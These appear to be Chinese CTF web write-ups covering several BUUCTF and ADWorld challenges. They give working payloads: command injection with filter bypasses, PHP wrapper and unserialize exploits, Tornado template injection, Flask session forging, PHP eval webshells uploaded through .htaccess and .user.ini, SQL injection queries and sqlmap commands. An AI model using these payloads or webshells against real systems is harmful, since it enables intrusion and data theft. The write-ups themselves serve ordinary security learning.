# Http 基础

## Ping

### 类型一：没有过滤可以查找的

题目地址：https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071&page=1

127.0.0.1 | find / -name "flag.txt" （将 | 替换成 & 或 && 都可以）,查找flag所在位置

之后

127.0.0.1 | cat /home/flag.txt 可得到flag


### 类型2： 有过滤的 


题目地址：https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping


#### 方案一

1. ?ip=127.0.0.1;ls

2. 过滤空格了，可以用 `${IFS}$` 代替：

3. 可能也过滤了{}，用 `$IFS$1` 代替：

4. `?ip=127.0.0.1;cat$IFS$1index.php`

5. `?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh`          此处 `Y2F0IGZsYWcucGhw` 是 `cat flag.php` 的 `base64-encode`


#### 方案二

方法名叫内联执行
方法:将反引号内命令的输出作为输入执行

输入

```
?ip=127.0.0.1;cat$IFS$1`ls`
```

#### 方法三

```
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
```

##  [极客大挑战 2019]Http(Http基础)


查看源码找到 Secret.php

打开 Secret.php 按照要求分别伪造

Refere：https://www.Sycsecret.com

X-forwarded-for：127.0.0.1

User-Agent：Syclover

之后发送请求，即可获取flag

## [极客大挑战 2019]BuyFlag

查看源码 发现 `pay.php`

进入 `pay.php` 发现提示要是

```
You must be a student from CUIT!!!
You must be answer the correct password!!!
```

才能获取 flag

首先查看源码，发现 `password` 是 404a (不能是404，404会被拦截)

```html
<!--
	~~~post money and password~~~
    if (isset($_POST['password'])) {
	    $password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->
```

然后查看 `Cookies` 发现有一个 `user` 变量为 0，尝试将其修改为 1 然后携带 `password` 发送 post 请求。

出现提示需要支付 `money`

再 `password` 后添加 `money` 字段获取

```
?password=404a&money=100000000 
```

出现提示 `money` 字段过长，修改 100000000 为科学计数法再次发送请求

```
?password=404a&money=1e9 
```

成功获取 flag{23e50dfa-f2f3-4b68-bea3-25f96b7acb48}

# PHP 后端

## [极客大挑战 2019]Secret File(PHP基础)

获取 action.php

由于 action.php 使用了302跳转，浏览器看不到具体内容，使用 burpsuite 获取 action.php 内容

得到 secr3t.php

之后使用 file=php://filter/convert.base64-encode/resource=flag.php 获取 base64 编码的 flag.php

然后解码获取flag

## [RoarCTF 2019]Easy Calc(PHP基础)


### 基础知识

我们知道PHP将查询字符串（在URL或正文中）转换为内部 `$_GET` 或的关联数组 `$_POST`。例如：`/?foo=bar` 变成 `Array([foo] => “bar”)`。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，`/?%20news[id%00=42会转换为Array([news_id] => 42)`。如果一个IDS/IPS或WAF中有一条规则是当`news_id`参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过：

`/news.php?%20news[id%00=42"+AND+1=0–`

上述PHP语句的参数 `%20news[id%00` 的值将存储到 `$_GET["news_id"]` 中。

PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：

```
1.删除空白符

2.将某些字符转换为下划线（包括空格）
```

如果 `http://www.xxx.com/index.php?num = aaaa   //显示非法输入的话` 则可以再 `num` 前加一个空格 变成 `http://www.xxx.com/index.php? num = aaaa` 

这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。

### scandir()

列出 参数目录 中的文件和目录，获取flag位置

如果直接使用 `scandir("/")` 发现会被屏蔽，则我们可以使用 `chr(47)` 来对其进行绕过。

```
?%20num=var_dump(scandir(chr(47)))
```

### 获取flag

之后使用 `file_get_contents()` 来获取文件即可


```
num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
```

## [ZJCTF 2019]NiZhuanSiWei


题目地址：https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei


```php
<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>
```

### 第一个绕过


```php
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
```

这里需要我们传入一个文件且其内容为welcome to the zjctf，这样的话往后面看没有其他可以利用的点，我们就无法写入文件再读取，就剩下了一个data伪协议。data协议通常是用来执行PHP代码，然而我们也可以将内容写入data协议中然后让file_get_contents函数取读取。构造如下：

In [25]:
import base64
data = "welcome to the zjctf"
print(base64.b64encode(data.encode("utf-8")))

b'd2VsY29tZSB0byB0aGUgempjdGY='


```
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
```

### 第二个绕过

```php
$file = $_GET["file"];
if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
```

这里有file参数可控，但是无法直接读取flag，可以直接读取/etc/passwd，但针对php文件我们需要进行base64编码，否则读取不到其内容，所以以下无法使用。

```
file=useless.php
```

所以下面采用filter来读源码，但上面提到过针对php文件需要base64编码，所以使用其自带的base64过滤器。

```
php://filter/read=convert.base64-encode/resource=useless.php
```

In [26]:
import base64
data = "PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo="
print(base64.b64decode(data.encode("utf-8")))

b'<?php  \n\nclass Flag{  //flag.php  \n    public $file;  \n    public function __tostring(){  \n        if(isset($this->file)){  \n            echo file_get_contents($this->file); \n            echo "<br>";\n        return ("U R SO CLOSE !///COME ON PLZ");\n        }  \n    }  \n}  \n?>  \n'


读到的useless.php内容如下：

```php
<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>
```

### 第三个绕过

```php
$password = $_GET["password"];
include($file);  //useless.php
$password = unserialize($password);
echo $password;
```

这里的file是我们可控的，所以在本地测试后有执行下面代码即可出现payload：

```
<?php  
class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$a = new Flag();
echo serialize($a);
?>
//O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
```

最后payload


```
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22:1:%7Bs:4:%22file%22;s:8:%22flag.php%22;%7D
```

查看网页源代码

```html

<br><h1>welcome to the zjctf</h1></br>  
<br>oh u find it </br>

<!--but i cant give it to u now-->

<?php

if(2===3){  
	return ("flag{99d3187d-afe6-4016-840f-baf0bac376c2}");
}

?>
<br>U R SO CLOSE !///COME ON PLZ
```

即可获取 flag

# Python 后端

## [护网杯 2018]easy_tornado


点击 flag.txt 进入发现 flag 文件在  /fllllllllllllag 中

直接访问 /fllllllllllllag 系统报错

之后进入 hints.txt 中

得到 filehash 的计算方法

md5(cookie_secret+md5(filename))

下面的问题就是如何获取 cookie_secret 了

点开 welcome.txt

发现写这 render，render 是 Python 中的一个渲染函数，渲染变量到模板中，即可以通过传递不同的参数形成不同的页面。


测试后发现还有一个error界面，格式为/error?msg=Error，怀疑存在服务端模板注入攻击 （SSTI）

尝试`/error?msg={{datetime}}`

在Tornado的前端页面模板中，datetime是指向python中datetime这个模块，Tornado提供了一些对象别名来快速访问对象，可以参考[Tornado官方文档](https://www.tornadoweb.org/en/latest/guide/templates.html#template-syntax)


通过查阅[文档](https://www.tornadoweb.org/en/latest/web.html#tornado.web.RequestHandler.settings) 发现cookie_secret在Application对象settings属性中，还发现self.application.settings有一个别名


`handler` 指向的处理当前这个页面的 `RequestHandler` 对象，

`RequestHandler.settings` 指向 `self.application.settings` ，

因此 `handler.settings` 指向 `RequestHandler.application.settings` 。

构造 `payload` 获取 `cookie_secret`


```
/error?msg={{handler.settings}}
```

得到

```
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '9a29b69a-5f54-4e96-add0-371d91e3ee2f'}
```

则 `cookie_secret` 等于 `9a29b69a-5f54-4e96-add0-371d91e3ee2f`


根据描述编写计算 `/fllllllllllllag` 的 `filehash` 代码

In [2]:
import hashlib

def md5(s):
    md5 = hashlib.md5()
    md5.update(s.encode(encoding='UTF-8'))
    return md5.hexdigest()
 
def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = '9a29b69a-5f54-4e96-add0-371d91e3ee2f'
    print(md5(cookie_secret + md5(filename)))
 
if __name__ == '__main__':
    filehash()

697ed38e2ac6ebb12ebfe1c770c4403f


构造请求

```
/file?filename=/fllllllllllllag&filehash=697ed38e2ac6ebb12ebfe1c770c4403f
```

得到 flag{90d2f72a-c7e8-4433-9b46-26a4cd286855}

## [HCTF 2018]admin


题目地址：https://buuoj.cn/challenges#[HCTF%202018]admin

拿到题目发现一共就登录注册两个功能，随便注册一个test/test用户

注册完拿test用户登录

登录之后查看源码发现提示 `<!-- you are not admin -->`，根据提示和题目名估计要让我们登录admin用户就可以得到flag。

在 change password 页面查看源码，发现提供了题目的源码地址

https://github.com/woadsl1234/hctf_flask

进入后发现是 flask 写的

### 方案一 flask session 伪造

我们可以使用 flask session 伪造来实现

想要伪造session，需要先了解一下flask中session是怎么构造的。

flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。
具体可参考：

https://xz.aliyun.com/t/3569

https://www.leavesongs.com/PENETRATION/client-session-security.html#

我们可以通过脚本将session解密一下，但是如果我们想要加密伪造生成自己想要的session还需要知道SECRET_KEY，然后我们在config.py里发现了SECRET_KEY

```
SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
```

然后在index.html页面发现只要 `session['name'] == 'admin'`即可以得到flag

```html
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>

{% include('footer.html') %}
```


于是我找了一个flask session加密解密的脚本 https://github.com/noraj/flask-session-cookie-manager

In [22]:
#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e

if __name__ == "__main__":
    data = '.eJw9kE1vgzAMhv_K5HMPJRsXpB4qQRGHGA0FIudSbS2FmKaTgKolVf_7sh52svTIfj_8gP1pbKceknm8tivY2yMkD3j7hgTID3dSTU_KOJNuvUwrW-rGSpYCc7SYNmwcRVJnC3FxL_PPmHiIyVWO9M6GfUa_vRF3CzoppC4i5MOtVHVMagg8u5nAMTXW6EyUmj7C9ChwQE2L0cVi-MiSu_cyDxlyPKOqBfouJlHcyckYuWFU2QaeKzhM42k__wzt5b-CVPUSTrxRlUOug93Oopf-j0vVn6Xq1iFGbPI6QlV4ElmE281L7vLl2iAxt9MMK7hO7fh6DkRreP4Ca7pmpQ.YWfYLQ.s3TufiRzTyYRf3-RGpzDfGXHHdw'
    # print(FSCM.decode(data, 'ckj123'))
    dataInfo = "{'_fresh': True, '_id': b'c91a5aa6fd0304b9eb2364cb45cff51a2b218d9b99bdfaab04c700b826c61b5670959a90b10fc646bea69f8ea37cd5f2eb2f7c2878ffdce556789cb1bc965c51', 'csrf_token': b'152553e4f650fab73315218e184b19de5523ca54', 'name': 'admin', 'user_id': '10'}"
    
    print(FSCM.encode('ckj123', dataInfo))

.eJw9kE2PgjAQhv_KZs4epCsXEw8mIOHQIUsKzfRiXEHoYN0ENEqN_327HvY0yZOZ92OesD-N7dTD-jre2gXsbQPrJ3x8wxrIDw9SdU_KOJNsvUxKW-jaSpYCM7SY1GwcRVKnM3H-KLKvmHiIyZWO9M6GfUa_vRN3MzoppM4j5OO9UFVMagg8vZvAMTHW6FQUmlZhehQ4oKbZ6Hw23LDk7rPIQoYMz6gqgb6LSeQPcjJGrhlVuoHXAo7TeNpff4b28l9BqmoOJ96o0iFXwW5n0Uv_x6Xqz1J1yxAjNlkVoco9iTTC7eYtdzm4NkgcGmcvsIDb1I7v70C0hNcv0kJm7g.YWfaVQ.fBawa1zvzBlc9P2cGTXmLxPVJAQ



利用刚刚得到的SECRET_KEY，在将解密出来的name改为admin，最后用上面的脚本生成我们想要的session即可


### 其他方案

https://blog.csdn.net/weixin_44677409/article/details/100733581


### 弱密码

尝试直接登录：账户：admin 密码：123 获取 flag

# 文件上传

## [ACTF2020 新生赛]Upload(文件上传)  

删除前端上传检测事件

上传 phtml 格式的一句话木马

```phtml
<script language='php'>@eval($_POST['a']);</script>
```

使用中国菜刀链接服务器获取flag

## [极客大挑战 2019]Upload(文件上传) 

使用 BurpSuite 修改上传文件头为 `Content-Type: image/jpeg`

然后上传 

```phtml
GIF89a? <script language='php'>@eval($_POST['a']);</script>
```

使用中国菜刀链接服务器获取flag

## [MRCTF2020]你传你🐎呢(文件上传)  

### 预备知识 .htaccess是什么

<br>

> .htaccess文件(或者"分布式配置文件"）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用 于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
>
> 概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
>
> 启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名， 可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。
>
> 笼统地说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。

### 创建 .htaccess 文件


```xml
<!-- 注意要指定你上传的文件名和此文件名相同，这样它才能被当作php文件解析 -->
<FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch>
```


这个文件的意思是 将 `a.png` 文件当作 php 文件来执行

### 上传 .htaccess 文件

使用 BurpSuite 抓包上传 .htaccess 文件

在上传时需要将 `Content-Type: application/octet-stream` 修改为 `Content-Type: image/png`

### 上传一句话木马

```php
<?php eval($_POST['a']);?>
```

将其保存为 `a.png` 文件

之后上传

```
http://3a79e9c3-e27e-40c9-b6e0-af40d2028543.node4.buuoj.cn:81/upload/c7e27b0181f9d00be86497d5427d8574/a.png
```

上传成功后使用蚁剑连接一下获取 flag{677ad6d8-e669-4b94-ad9f-8db2453e338b}

## [SUCTF 2019]CheckIn


### 背景知识 .user.ini

`.user.ini` 是php默认的配置文件，其中包括了很多php的配置，这些配置中，又分为几种：PHP_INI_SYSTEM、PHP_INI_PERDIR、PHP_INI_ALL、PHP_INI_USER，在此可以查看：http://php.net/manual/zh/ini.list.php 这几种模式有什么区别？看看官方的解释。

本次要用到的

```
auto_prepend_file=a.gif
```

意思为指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在.user.ini中：

`a.gif` 是要包含的文件。

所以，我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell。


### 制作 `.user.ini`



```
GIF89a
auto_prepend_file=a.gif
```

`GIF89a` 是伪造请求头


### 制作 `a.gif`

```
GIF89a?
<script language="php">eval($_POST['a']);</script>
```

然后上传这两个文件，使用菜刀连接即可


```
http://00db54e8-6c50-43ab-b24b-9693f2229a94.node4.buuoj.cn:81/uploads/d38749ebec747e941ad85069255fa624/index.php
```



# SQL 注入

## [极客大挑战 2019]LoveSQL(SQL注入)   


首先尝试万能密码

```
?username=admin'or'1'='1&password=admin'or'1'='1
```

获取密码，直接拿获取的密码提交flag，发现错误。

接着尝试

由于是 url 中输入，所以不能用 `#` 得用 `%23`
```
/check.php?username=admin' order by 3%23&password=1     存在
```

可知共3个字段。用 `union` 查询测试注入点（回显点位）：

```
/check.php?username=1' union select 1,2,3%23&password=1
```

得到回显点位为2和3，查询当前数据库名及版本：

```
/check.php?username=1' union select 1,database(),version()%23&password=1
```

接下来查询表

```
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
```

得到 `geekuser` 和 `l0ve1ysq1` 两个表


查看 `l0ve1ysq1` 表字段 

```
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
```

获取数据，拿到flag


```
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
```

## NewsCenter

### 目标

简单的SQL注入，读取 information_schema 元数据，然后读取flag。
sqlmap 也可解。

### 环境
windows

### 工具
sqlmap

### 分析过程

1.初步探测,发现搜索框存在注入 `' union select 1,2,3 #`

2.获取数据库名，表名 `' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #`

3.获取news 表的字段名，数据类型 `' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'#`

4.获取f1agfl4gher3 字段名 数据类型 `' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#`

5.得到flag `' and 0 union select 1,2,fl4g from secret_table #`


### sqlmap版本


1.获取注入点

```bash
sqlmap -u http://192.168.100.161:53459 --data "search=df"
```


2.获取数据库信息

```bash
sqlmap -u http://192.168.100.161:53459 --data "search=df" -dbs
```


3.获取库内表信息

```bash
sqlmap -u http://192.168.100.161:53459 --data "search=df" -D news --tables
```


4.获取表内字段信息

```bash
sqlmap -u http://192.168.100.161:53459 --data "search=df" -D news -T secret_table --columns
```


5.获取字段内容，得到flag

```bash
sqlmap -u http://192.168.100.161:53459 --data "search=df" -D news -T secret_table -C "fl4g" --dump
```

## 万能密码


```
/check.php?username=admin'or'1'='1&password=admin'or'1'='1
```



##  SQL注入-1《从0到1：CTFer成长之路》[第一章 web入门]



### 手动注入

尝试注入 `?id=1’ order by 3 --+` 页面正常


`?id=1’ order by 4 --+ ` 页面报错，说明存在2，3两个回显

查库名

```  
?id=-1' union select 1,database(),3 --+
```

查表名

```
?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 0,1 --+


?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 1,1 --+
```

发现这边只有两个表，一个是fl4g，一个是notes

查找 fl4g 列名

```
?id=-1' union select 1,database(), group_concat(column_name) from information_schema.columns where table_name='fl4g' --+
```

得到列名： `fllllag`

获取字段

```
?id=-1' union select 1,database(), group_concat(fllllag) from fl4g --+
```

得到 flag 为 `n1book{union_select_is_so_cool}`


### sqlmap


获取数据库信息

```
python sqlmap.py -u http://8426513d-8690-437c-a0d7-f560267f2b73.node4.buuoj.cn:81/index.php?id=1 -dbs
```

得到

```
available databases [4]:
[*] information_schema
[*] mysql
[*] note
[*] performance_schema
```

查找 note 表

```
python sqlmap.py -u http://8426513d-8690-437c-a0d7-f560267f2b73.node4.buuoj.cn:81/index.php?id=1 -D note --tables
```

得到

```
Database: note
[2 tables]
+-------+
| fl4g  |
| notes |
+-------+
```

查找表 fl4g

```
python sqlmap.py -u http://8426513d-8690-437c-a0d7-f560267f2b73.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns
```

得到

```
Database: note
Table: fl4g
[1 column]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| fllllag | varchar(40) |
+---------+-------------+
```

查找 fllllag 值


```
python sqlmap.py -u http://8426513d-8690-437c-a0d7-f560267f2b73.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C  fllllag --dump
```

得到

```
Database: note
Table: fl4g
[1 entry]
+---------------------------------+
| fllllag                         |
+---------------------------------+
| n1book{union_select_is_so_cool} |
+---------------------------------+
```

#  信息查找

## 常见的搜集《从0到1：CTFer成长之路》第一章 web入门 


使用目录扫描工具进行扫描

打开 dirsearch/御剑。


```
python dirsearch.py -u http://b9f02809-1c1d-411a-a56d-cdccc3a3d4f6.node4.buuoj.cn:81/ -e php -s 2 --exclude-status 200 --random-agent
```


得到这三个返回正常 `robots.txt` , `index.php~` , `.index.php.swp`


分别访问这三个目录

在 `robots.txt` 中得到

```
User-agent: *
Disallow:
/flag1_is_her3_fun.txt
```

访问 `/flag1_is_her3_fun.txt` 得到 `flag1:n1book{info_1`

访问 `index.php~` 得到 `flag2:s_v3ry_im`

最后访问 `.index.php.swp` 得到 `flag3:p0rtant_hack}`


将这三个拼接在一起即可得到 flag

```
n1book{info_1s_v3ry_imp0rtant_hack}
```


## 粗心的小李《从0到1：CTFer成长之路》第一章 web入门第一章 web入门 


查看题目发现提示 git泄露漏洞

直接使用 GitHack 获取 git 文件

```
python GitHack.py http://edeeda0a-3566-409b-b810-53b071b4d273.node4.buuoj.cn:81/.git/
```

GitHack-py3：https://github.com/tigert1998/GitHack-py3
